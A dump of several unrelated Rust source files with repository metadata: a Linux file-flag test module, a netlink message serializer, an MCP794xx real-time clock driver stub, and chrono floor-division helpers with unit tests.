{ std::process::Command::new("chattr") .arg("+A").arg(&tempfile) .status() .unwrap() .success() }; let request = Request { path: tempfile, follow_symlink: false, collect_ext_attrs: false, }; let mut session = session::FakeSession::new(); assert!(handle(&mut session, request).is_ok()); assert_eq!(session.reply_count(), 1); let reply = session.reply::<Response>(0); let flags = reply.flags_linux.unwrap(); assert_eq!(flags & FS_NOATIME_FL as u32, FS_NOATIME_FL as u32); } #[cfg(all(target_os = "linux", feature = "test-chattr"))] #[test] fn test_handle_with_symlink_flags_on_linux() { let tempdir = tempfile::tempdir().unwrap(); let symlink = tempdir.path().join("foo"); let target = tempdir.path().join("bar"); std::fs::File::create(&target).unwrap(); std::os::unix::fs::symlink(&target, &symlink).unwrap(); assert! { std::process::Command::new("chattr") .arg("+d").arg(&target) .status() .unwrap() .success() }; let request = Request { path: symlink, follow_symlink: false, collect_ext_attrs: false, }; let mut session = session::FakeSession::new(); assert!(handle(&mut session, request).is_ok()); assert_eq!(session.reply_count(), 1); let reply = session.reply::<Response>(0); assert_eq!(reply.flags_linux, None); } #[cfg(all(target_os = "linux", feature = "test-chattr"))] #[test] fn test_handle_with_symlink_flags_and_follow_symlink_on_linux() { // https://elixir.bootlin.com/linux/v5.8.14/source/include/uapi/linux/fs.h#L245 const FS_NODUMP_FL: std::os::raw::c_long = 0x00000040; let tempdir = tempfile::tempdir().unwrap(); let symlink = tempdir.path().join("foo"); let target = tempdir.path().join("bar"); std::fs::File::create(&target).unwrap(); std::os::unix::fs::symlink(&target, &symlink).unwrap(); assert! { std::process::Command::new("chattr") .arg("+d").arg(&target) .status() .unwrap() .success() }; let request = Request { path: symlink, follow_symlink: true, collect_ext_attrs: false, }; let mut session = session::FakeSession::new(); assert!(handle(&mut session, request).is_ok()); assert_eq!(session.reply_count(), 1); let reply = session.reply::<Response>(0); let flags = reply.flags_linux.unwrap(); assert_eq!(flags & FS_NODUMP_FL as u32, FS_NODUMP_FL as u32); } }
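// Minimal usage sketch following the test pattern above, assuming `FakeSession`
// remains available under `crate::session`; the path comes from the caller.
#[cfg(test)]
mod usage_sketch {
    use super::*;

    #[allow(dead_code)]
    fn stat_one(path: std::path::PathBuf) -> bool {
        let request = Request {
            path,
            follow_symlink: false,
            collect_ext_attrs: false,
        };
        let mut session = session::FakeSession::new();
        // On success `handle` sends exactly one reply carrying the collected metadata.
        handle(&mut session, request).is_ok() && session.reply_count() == 1
    }
}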
true
3a23873497097fb9f4d6918b8c4988a4fda4203c
Rust
shun159/vr_types
/src/netlink/message.rs
UTF-8
2,602
2.5625
3
[ "LicenseRef-scancode-unknown-license-reference", "Apache-2.0" ]
permissive
use super::raw::{nlmsghdr, NLMSG_LENGTH};
use super::Serialize;
use crate::genetlink::GenericNetlinkMessage;
use netlink_sys::Socket;
use std::process;
use zerocopy::LayoutVerified;

#[derive(Debug)]
pub struct NetlinkMessage<P> {
    pub ty: u16,
    pub flags: u16,
    pub seq: u32,
    pub pid: u32,
    pub payload: P,
}

impl<P: Serialize> NetlinkMessage<P> {
    pub fn new(ty: u16, flags: u16, payload: P) -> NetlinkMessage<P> {
        NetlinkMessage {
            ty: ty,
            flags: flags,
            seq: 0,
            pid: process::id(),
            payload: payload,
        }
    }

    pub fn send_nl(&self, socket: &Socket) {
        let mut buffer = [0; 1000];
        let byte_size = self.len() as usize;
        self.serialize(&mut buffer[..byte_size]);
        socket.send(&buffer[..byte_size], 0).unwrap();
    }

    // Generic NETLINK message specific shortcut function
    pub fn recv_nl(socket: &Socket) -> NetlinkMessage<GenericNetlinkMessage<Vec<u8>>> {
        let mut buffer = [0; 1000];
        let reply_len = socket.recv(&mut buffer, 0).unwrap();
        let nl_msg = NetlinkMessage::deserialize(&buffer[..reply_len]);
        let genl_msg = GenericNetlinkMessage::deserialize(nl_msg.payload).unwrap();
        NetlinkMessage::new(
            nl_msg.ty,
            nl_msg.flags,
            GenericNetlinkMessage::new(
                genl_msg.cmd,
                genl_msg.version,
                genl_msg.payload.to_vec(),
            ),
        )
    }
}

impl<P: Serialize> Serialize for NetlinkMessage<P> {
    fn len(&self) -> u32 {
        NLMSG_LENGTH(self.payload.len())
    }

    fn serialize(&self, buf: &mut [u8]) {
        let header_len = NLMSG_LENGTH(0) as usize;
        let (header, payload) = buf.split_at_mut(header_len);
        let mut header = LayoutVerified::<_, nlmsghdr>::new(header).expect("invalid buffer");
        header.nlmsg_len = self.len();
        header.nlmsg_type = self.ty;
        header.nlmsg_flags = self.flags;
        header.nlmsg_seq = self.seq;
        header.nlmsg_pid = self.pid;
        self.payload.serialize(payload);
    }
}

impl<'a> NetlinkMessage<&'a [u8]> {
    pub fn deserialize(buf: &'a [u8]) -> Self {
        let header_len = NLMSG_LENGTH(0) as usize;
        let (header, payload) = buf.split_at(header_len);
        let header = LayoutVerified::<_, nlmsghdr>::new(header).expect("invalid buffer");
        Self {
            ty: header.nlmsg_type,
            flags: header.nlmsg_flags,
            seq: header.nlmsg_seq,
            pid: header.nlmsg_pid,
            payload,
        }
    }
}
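// Minimal sending sketch over an already-opened socket; the family id, command,
// version and attribute bytes are placeholders, and the `u16`/`u8` parameter types
// are assumed from the generic-netlink wire format.
#[allow(dead_code)]
fn send_generic(socket: &Socket, family_id: u16, cmd: u8, version: u8, attrs: Vec<u8>) {
    // Wrap the generic-netlink payload in a netlink header and push it out.
    let genl = GenericNetlinkMessage::new(cmd, version, attrs);
    NetlinkMessage::new(family_id, 0, genl).send_nl(socket);
    // A reply, if expected, can then be read back with `NetlinkMessage::recv_nl(socket)`.
}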
true
c4be8cdf17ed008d310934810155f374a3f96201
Rust
thejpster/mcp794xx-rs
/src/common/datetime.rs
UTF-8
2,811
2.65625
3
[ "Apache-2.0", "MIT", "LicenseRef-scancode-unknown-license-reference" ]
permissive
//! Common date/time function

use super::super::{BitFlags, DateTime, Error, Hours, Mcp794xx, Register, Rtcc};
use super::{decimal_to_packed_bcd, hours_from_register, hours_to_register, packed_bcd_to_decimal};
use interface;

impl<DI, E> Rtcc for Mcp794xx<DI>
where
    DI: interface::WriteData<Error = Error<E>> + interface::ReadData<Error = Error<E>>,
{
    type Error = Error<E>;

    fn get_seconds(&mut self) -> Result<u8, Self::Error> {
        let seconds = self.iface.read_register(Register::SECONDS)?;
        let seconds = packed_bcd_to_decimal(seconds & !BitFlags::ST);
        Ok(seconds)
    }

    fn get_minutes(&mut self) -> Result<u8, Self::Error> {
        let minutes = self.iface.read_register(Register::MINUTES)?;
        Ok(packed_bcd_to_decimal(minutes))
    }

    fn get_hours(&mut self) -> Result<Hours, Self::Error> {
        let data = self.iface.read_register(Register::HOURS)?;
        Ok(hours_from_register(data))
    }

    fn get_weekday(&mut self) -> Result<u8, Self::Error> {
        Err(Error::InvalidInputData)
    }

    fn get_day(&mut self) -> Result<u8, Self::Error> {
        Err(Error::InvalidInputData)
    }

    fn get_month(&mut self) -> Result<u8, Self::Error> {
        Err(Error::InvalidInputData)
    }

    fn get_year(&mut self) -> Result<u16, Self::Error> {
        Err(Error::InvalidInputData)
    }

    fn set_seconds(&mut self, seconds: u8) -> Result<(), Self::Error> {
        Self::check_lt(seconds, 60)?;
        let seconds = decimal_to_packed_bcd(seconds);
        let value = if self.is_enabled {
            seconds | BitFlags::ST
        } else {
            seconds
        };
        self.iface.write_register(Register::SECONDS, value)
    }

    fn set_minutes(&mut self, minutes: u8) -> Result<(), Self::Error> {
        Self::check_lt(minutes, 60)?;
        let minutes = decimal_to_packed_bcd(minutes);
        self.iface.write_register(Register::MINUTES, minutes)
    }

    fn set_hours(&mut self, hours: Hours) -> Result<(), Self::Error> {
        let value = hours_to_register(hours)?;
        self.iface.write_register(Register::HOURS, value)
    }

    fn set_weekday(&mut self, weekday: u8) -> Result<(), Self::Error> {
        Err(Error::InvalidInputData)
    }

    fn set_day(&mut self, day: u8) -> Result<(), Self::Error> {
        Err(Error::InvalidInputData)
    }

    fn set_month(&mut self, month: u8) -> Result<(), Self::Error> {
        Err(Error::InvalidInputData)
    }

    fn set_year(&mut self, year: u16) -> Result<(), Self::Error> {
        Err(Error::InvalidInputData)
    }

    fn get_datetime(&mut self) -> Result<DateTime, Self::Error> {
        Err(Error::InvalidInputData)
    }

    fn set_datetime(&mut self, datetime: &DateTime) -> Result<(), Self::Error> {
        Err(Error::InvalidInputData)
    }
}
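// Minimal sketch built on the `Rtcc` impl above; the device construction is assumed
// to have happened elsewhere, so the driver is taken by reference.
#[allow(dead_code)]
fn advance_minutes<DI, E>(rtc: &mut Mcp794xx<DI>) -> Result<(), Error<E>>
where
    DI: interface::WriteData<Error = Error<E>> + interface::ReadData<Error = Error<E>>,
{
    let minutes = rtc.get_minutes()?;
    // Wrap at the top of the hour; `set_minutes` rejects values of 60 or more.
    rtc.set_minutes((minutes + 1) % 60)
}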
true
046fceba178613b5c001ae77cda1697cc31212da
Rust
marco-c/gecko-dev-comments-removed
/third_party/rust/chrono/src/div.rs
UTF-8
985
2.734375
3
[ "LicenseRef-scancode-unknown-license-reference", "MIT", "Apache-2.0" ]
permissive
pub use num_integer::{div_floor, div_mod_floor, div_rem, mod_floor};

#[cfg(test)]
mod tests {
    use super::{div_mod_floor, mod_floor};

    #[test]
    fn test_mod_floor() {
        assert_eq!(mod_floor(8, 3), 2);
        assert_eq!(mod_floor(8, -3), -1);
        assert_eq!(mod_floor(-8, 3), 1);
        assert_eq!(mod_floor(-8, -3), -2);
        assert_eq!(mod_floor(1, 2), 1);
        assert_eq!(mod_floor(1, -2), -1);
        assert_eq!(mod_floor(-1, 2), 1);
        assert_eq!(mod_floor(-1, -2), -1);
    }

    #[test]
    fn test_div_mod_floor() {
        assert_eq!(div_mod_floor(8, 3), (2, 2));
        assert_eq!(div_mod_floor(8, -3), (-3, -1));
        assert_eq!(div_mod_floor(-8, 3), (-3, 1));
        assert_eq!(div_mod_floor(-8, -3), (2, -2));
        assert_eq!(div_mod_floor(1, 2), (0, 1));
        assert_eq!(div_mod_floor(1, -2), (-1, -1));
        assert_eq!(div_mod_floor(-1, 2), (-1, 1));
        assert_eq!(div_mod_floor(-1, -2), (0, -1));
    }
}
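// A small companion check, assuming the re-exported `div_mod_floor` above: floored
// division rounds toward negative infinity, unlike Rust's truncating `/` and `%`.
#[cfg(test)]
mod floor_vs_truncate {
    use super::div_mod_floor;

    #[test]
    fn differs_from_truncating_division_for_negatives() {
        // Truncating division rounds toward zero.
        assert_eq!((-8 / 3, -8 % 3), (-2, -2));
        // Floored division rounds toward negative infinity.
        assert_eq!(div_mod_floor(-8, 3), (-3, 1));
    }
}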
true